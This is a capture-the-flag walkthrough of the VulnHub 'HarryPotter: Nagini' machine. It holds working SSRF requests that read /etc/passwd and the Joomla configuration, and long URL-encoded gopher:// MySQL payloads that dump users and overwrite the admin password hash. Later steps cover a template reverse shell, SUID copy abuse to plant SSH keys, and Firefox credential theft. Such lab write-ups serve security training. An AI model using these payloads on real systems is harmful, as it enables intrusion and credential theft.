https://www.vulnhub.com/entry/harrypotter-nagini,689/
Very interesting machine, first time for me to do SSRF with Gopher.
Nmap scan ports first.
nmap -sV -sC -p- 192.168.56.99 -oN ports.log
Scan port 80, find note.txt and joomla CMS.
gobuster dir -u http://192.168.56.98 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
Note.txt told us, we need http3 protocol.
Add quic.nagini.hogwarts to /etc/hosts. Then compile a custom curl following this tutorial:
https://github.com/curl/curl/blob/master/docs/HTTP3.md
Now we'll get a custom curl with http3 support.
Visit the site with http3, get a new note, which told us 2 hints, 1st, there is a internalResourceFeTcher.php, 2nd, there is configuration bak file.
Check internalResourceFeTcher.php, it's a php file with SSRF.
Use file:// protocol, we can get content of /etc/passwd.
curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///etc/passwd'
Then we can get configuration.php (or configuration.php.bak) of joomla, and get the user name of mysql.
Also, we can get the db name and db prefix for joomla CMS.
curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///var/www/html/joomla/configuration.php'
After google a lot and thanks for the hints from guys @vulnhub discord channel, I know the next step is to use gopher to run mysql cmd to get information.
Here we need a tool:https://github.com/tarunkant/Gopherus. Run gopherus, it will generate the gopher link. Let's try sql cmd 'use joomla;show tables;'
gopher://127.0.0.1:3306/_%a6%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%65%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%18%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01
Then we need to url encode the gopher link. It's important, I stuck here for a looooong time.
Then we have to visit the site with url from browser. (curl does not work here.) If there is no content displayed, just refresh the page for some times.
http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2518%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501
Then we can check content of table "joomla_users".
Use gopherus to generate the gopher link of "use joomla;select * from joomla_users;"
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01
Then visit the site again. Now we get the user name and password hash of "site_admin"
http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2527%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501
The password hash can not be cracked online, so we have to modify it. Let's use the md5 hash of "password" string:5f4dcc3b5aa765d61d8327deb882cf99.
And use gopherus to generate link of command:
use joomla; update joomla_users set password = '5f4dcc3b5aa765d61d8327deb882cf99' where username='site_admin';select * from joomla_users;
If it works, we will see new password hash on webpage.
Now we can login control panel of joomla CMS with site_admin:password.
In template editing, we can create a new file rev.php, with reverse shell code. Or we can directly modify index.php, add reverse shell code in it.
Listen as port 1234, and visit http://192.168.56.99/joomla/templates/protostar/rev.php.
In snape's home folder, we found .creds.txt, which is base64 code of snape's password.
With this password, we can login ssh as user snape.
Find SUID file, notice su_cp.
su_cp just copy some file from src to dest. So we can upload id_rsa.pub, and copy it to /home/hermoine/.ssh/authorized_keys.
Then we can login ssh as user hermoine without password.
In home, we found .mozilla folder.
Remote copy the whole .mozilla folder to local machine.
scp -rp hermoine@quic.nagini.hogwarts:/home/hermoine/.mozilla /tmp
Download the magic script from here:https://github.com/unode/firefox_decrypt
Then we can get root credentials using this script.
Thanks wish@discord for the first writeup. You can check it here:
https://vishal-chandak.medium.com/vulnhub-harrypotter-nagini-walkthrough-68259262e9cf